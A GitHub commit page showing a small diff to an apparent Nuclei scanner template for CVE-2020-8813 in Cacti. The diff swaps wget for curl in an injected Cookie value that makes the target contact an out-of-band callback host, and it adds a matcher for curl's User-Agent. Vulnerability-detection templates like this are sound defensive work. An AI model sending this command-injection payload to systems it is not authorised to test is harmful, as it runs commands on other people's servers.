Merge pull request #7001 from j4vaovo/patch-5

Update CVE-2020-8813.yaml
patch-1
Ritik Chaddha 2023-04-21 00:35:34 +05:30 committed by GitHub
commit dd821571bc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 1 deletions

View File

@ -23,7 +23,7 @@ requests:
- |
GET /graph_realtime.php?action=init HTTP/1.1
Host: {{Hostname}}
Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}
matchers:
- type: word
@ -31,4 +31,9 @@ requests:
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# Enhanced by mp on 2022/06/27